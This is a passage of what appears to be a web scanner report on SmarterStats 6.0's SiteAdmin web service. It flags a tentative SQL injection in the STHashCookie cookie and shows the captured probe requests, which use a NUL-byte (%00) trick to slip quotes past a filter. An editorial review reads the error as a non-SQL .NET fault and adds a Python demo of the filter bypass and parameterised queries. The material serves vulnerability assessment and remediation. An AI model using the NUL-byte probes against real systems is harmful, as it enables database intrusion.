&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteResult&gt;
&lt;/AddSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;/AddSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteResult&gt;
&lt;/AddSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.9. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Reviewing it here: Response 1 is the ASP.NET error page for System.InvalidOperationException "Collection was modified; enumeration operation may not execute", thrown from System.Collections.HashtableEnumerator.MoveNext inside System.Xml.Serialization.XmlSchemas.Compile, again under ASP.defaultwsdlhelpgenerator_aspx.Page_Load (the built-in help page for ?op=GetSite). That is the exception .NET raises when a collection is changed while it is being enumerated. There is no database frame in the trace, and with a scanner firing concurrent requests at the help page this is consistent with a thread-safety problem in schema compilation rather than with a SQL error. The Tentative confidence is warranted: confirm with a database-specific error or a blind-injection test before treating the cookie as injectable.

The scanner also reports that the application attempts to block SQL injection attacks but that this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
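Two things in the text above are worth seeing in working code: what the single-quote / double-quote probe is actually testing for, and why a NUL byte hides the quote from a native-code filter but not from the application behind it. The Python below is an added example for this editorial pass, not part of the original report and not SmarterStats code. The sqlite3 table, the concatenating lookup and the two filter models are constructed; the probe string is the STHashCookie value from Request 1 below. Since the trace in Response 1 shows no database call, the first half models the condition the scanner assumed rather than one it demonstrated.

```python
import sqlite3
from urllib.parse import unquote_to_bytes

# --- Why the probe is "one quote errors, two quotes do not" -----------------
# Inside a SQL string literal a single ' ends the literal early and leaves the
# statement unparseable; '' is the SQL escape for one literal quote, so the
# statement parses again. That error-then-silence pattern is all the scanner
# observed. The table and the concatenating lookup are constructed for this
# example and are not SmarterStats code.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (hash TEXT, section TEXT)")
    conn.execute("INSERT INTO sessions VALUES ('727517837', 'AdminManage')")
    return conn


def lookup_unsafe(conn, cookie_value):
    """String concatenation: the cookie value becomes SQL syntax.
    Returns (rows, None) or (None, exception class name)."""
    sql = "SELECT section FROM sessions WHERE hash = '" + cookie_value + "'"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return None, type(exc).__name__


def lookup_safe(conn, cookie_value):
    """Parameterised: the value is bound as data and can never close the literal.
    This is the 'fix the actual vulnerability within the application code'."""
    return conn.execute(
        "SELECT section FROM sessions WHERE hash = ?", (cookie_value,)
    ).fetchall()


# --- The NUL-byte bypass ----------------------------------------------------
BLOCKED = (b"'", b"--", b";")


def waf_native(decoded):
    """Models a filter written in C: strlen()/strstr() stop at the first NUL,
    so everything after it is invisible to the inspection. Returns True if
    the request is allowed through."""
    visible = decoded.split(b"\x00", 1)[0]
    return not any(token in visible for token in BLOCKED)


def waf_length_aware(decoded):
    """Inspects the whole buffer, which is also what a managed-code
    application (length-prefixed .NET strings) will see."""
    return not any(token in decoded for token in BLOCKED)


# The STHashCookie value from Request 1, after the web server's URL-decode.
PROBE = unquote_to_bytes(
    '{"CountsGuid":"727517837","TopBarSection":"AdminManage"}%00\''
)

if __name__ == "__main__":
    db = make_db()
    print("one quote :", lookup_unsafe(db, "'"))
    print("two quotes:", lookup_unsafe(db, "''"))
    print("bound     :", lookup_safe(db, "'"))
    print("native WAF allows probe:", waf_native(PROBE))
    print("length-aware WAF allows probe:", waf_length_aware(PROBE))
    print("application sees a quote:", b"'" in PROBE)
```

The native-style filter lets the probe through because the quote sits after the NUL; the length-aware filter and the application both see it. Whether that quote then reaches a query is exactly what the captured trace does not show, which is why the parameterised lookup, not a better filter, is the fix the remediation text calls for.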

Request 1

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%00'; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%00''; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19036
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetSite</h2>
<p class="intro">Returns one site listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
